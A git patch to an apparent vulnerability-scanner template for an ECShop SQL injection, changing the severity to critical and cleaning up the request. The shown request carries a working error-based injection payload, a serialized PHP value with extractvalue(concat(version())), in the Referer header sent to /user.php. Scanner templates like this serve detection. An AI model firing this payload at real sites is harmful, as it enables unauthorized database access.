From 38135df2a618d07c3a08313be3d3c16d0b3742db Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:30:38 +0000 Subject: [PATCH] Update ecshop-sql.yaml --- vulnerabilities/other/ecshop-sql.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml index d8f7000ac0..fa829e0926 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -1,16 +1,15 @@ info: name: Ecshop-SQL author: Lark-lab,ImNightmaree - severity: medium + severity: critical tages: sql,php,cms -requests: +requests: - raw: - | POST /user.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} Accept-Encoding: gzip, deflate @@ -25,5 +24,4 @@ requests: - 'XPATH' - 'MySQL' - 'Array' - condition: and - + condition: and